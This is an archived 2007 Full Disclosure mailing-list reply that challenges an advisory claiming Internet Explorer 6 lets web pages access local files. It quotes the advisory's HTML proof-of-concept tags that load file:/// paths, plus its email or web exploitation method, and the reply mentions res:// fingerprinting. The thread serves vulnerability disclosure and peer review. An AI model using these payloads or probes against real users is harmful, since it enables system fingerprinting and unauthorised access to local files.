Full Disclosure mailing list archives
Re: Microsoft Internet Explorer Local File Accesses Vulnerability
From: "pdp (architect)" <pdp.gnucitizen () googlemail com>
Date: Tue, 20 Feb 2007 09:57:30 +0000
hi Rajesh, Maybe it is too early in the morning in UK and that's why I may act like a stupid, but how come this is a vulnerability? For sure you can open files from the file system by using various HTML elements but can you really read their content, I don't think so. Firefox has done a good job in restricting access to local files if they are called from remote locations such as http and https. This rule, however, can be circumvented in a number of ways. IE does perform some of these checks, although, I have tested the POC you provided and I cannot see it working. I am running XP SP2, no lock downs what so ever. I see how this trick can be used to identify the operating system version but again, this is not a new thing. You can do similar stuff with the res:// protocol. In fact you can use this protocol to identify currently installed applications, which I believe is pretty cool. So, can you explain why this is a hole and how it can be used by attackers? :) Thanks man, All the best On 2/19/07, Rajesh Sethumadhavan <rajesh.sethumadhavan () yahoo com> wrote:
Microsoft Internet Explorer Local File Accesses Vulnerability ##################################################################### XDisclose Advisory : XD100099 Vulnerability Discovered : February 10th 07 Advisory Released : February 20th 07 Credit : Rajesh Sethumadhavan Class : Local File Accesses Severity : Critical Solution Status : Unpatched Vendor : Microsoft Corporation Affected applications : Microsoft Internet Explorer Affected version : Microsoft Internet Explorer 6 confirmed (Other versions may be also affected) Affected Platform : Windows XP Professional SP0,SP1,SP2 Windows Home Edition SP0,SP1,SP2 Windows 2003 ##################################################################### Overview: Microsoft Internet Explorer is a default browser bundled with all versions of Microsoft Windows operating system. Description: A vulnerability has been identified in Microsoft Internet Explorer, (default installation) in windows XP service pack 2 which could be exploited by malicious users to obtain victims local files. This flaw is due to an error in the way Microsoft Internet explorer handles different html tags. Which could be exploited by a malicious remote user to obtain sensitive local files from the victim's computer. Vulnerability Insight : Microsoft Windows explorer is not handling various html tags like "img" "script" "embed" "object" "param" "style" "bgsound" "body" "input" (Other tags may be also vulnerable). By using the file protocol along with above tags it is possible to accesses victims local files. a) Embed Tag Local file Accesses: --------------------------------------------------------------------- <EMBED SRC="file:///C:/test.pdf" HEIGHT=600 WIDTH=1440></EMBED> --------------------------------------------------------------------- b) Object & Param Tag Local File Accesses: --------------------------------------------------------------------- <object type="audio/x-mid" data=" file:///C:/test.mid" width="200" height="20"> <param name="src" value="file:///C:/test.mid"> <param name="autoStart" value="true"> <param name="autoStart" value="0"> </object> --------------------------------------------------------------------- c) Body Tag Local File Accesses: --------------------------------------------------------------------- <body background="file:///C:/test.gif" onload="alert('loading body bgrd success')" onerror="alert('loading body bgrd error')"> --------------------------------------------------------------------- d) Style Tag Local File Accesses: --------------------------------------------------------------------- <STYLE type="text/css">BODY{background:url(" file:///C:/test.gif")} </STYLE> --------------------------------------------------------------------- e) Bgsound Tag Local File Accesses: --------------------------------------------------------------------- <bgsound src="file:///C:/test.mid" id="soundeffect" loop=1 autostart= "true"/> --------------------------------------------------------------------- f) Input Tag Local File Accesses: --------------------------------------------------------------------- <form> <input type="image" src=" file:///C:/test.gif" onload="alert('loading input success')" onerror="alert('loading input error')"> </form> --------------------------------------------------------------------- g) Image Tag Local File Accesses: --------------------------------------------------------------------- <img src="file:///C:/test.jpg" onload="alert('loading image success')" onerror="alert('loading image error')"> --------------------------------------------------------------------- h) Script Tag Local File Accesses: --------------------------------------------------------------------- <script src="file:///C:/test.js"></script > --------------------------------------------------------------------- Exploitation method: - Creates a web page or an HTML Mail with the vulnerable code - When the victim opens the mail or visit the vulnerable site it is possible to accesses his local files. Demonstration: Note: Demonstration will try to accesses few default images and wave files - Visit the POC - If vulnerable internet explorer is used it will show your local sample images and give a proper alert. Solution: No solution Screenshot: http://www.xdisclose.com/images/xdiscloselocalie.jpg Proof Of Concept: http://www.xdisclose.com/poc/xdiscloselocalie.html Impact: A Remote user can get accesses to victims local system files. Scope of impact is limited to system level. Original Advisory: http://www.xdisclose.com/XD100099.txt Credits: Rajesh Sethumadhavan has been credited with the discovery of this vulnerability Disclaimer: This entire document is strictly for educational, testing and demonstrating purpose only. Modification use and/or publishing this information is entirely on your own risk. The exploit code is to be used on your testing environment only. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
-- pdp (architect) | petko d. petkov http://www.gnucitizen.org _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Microsoft Internet Explorer Local File Accesses Vulnerability Rajesh Sethumadhavan (Feb 19)
- Re: Microsoft Internet Explorer Local File Accesses Vulnerability Michal Zalewski (Feb 19)
- Re: Microsoft Internet Explorer Local File Accesses Vulnerability Peter Dawson (Feb 19)
- Re: Microsoft Internet Explorer Local File Accesses Vulnerability Michal Zalewski (Feb 20)
- Re: Microsoft Internet Explorer Local File Accesses Vulnerability Peter Dawson (Feb 19)
- Re: Microsoft Internet Explorer Local File Accesses Vulnerability [7244ks] Microsoft Security Response Center (Feb 19)
- Re: Microsoft Internet Explorer Local File Accesses Vulnerability pdp (architect) (Feb 20)
- Re: Microsoft Internet Explorer Local File Accesses Vulnerability Michal Zalewski (Feb 19)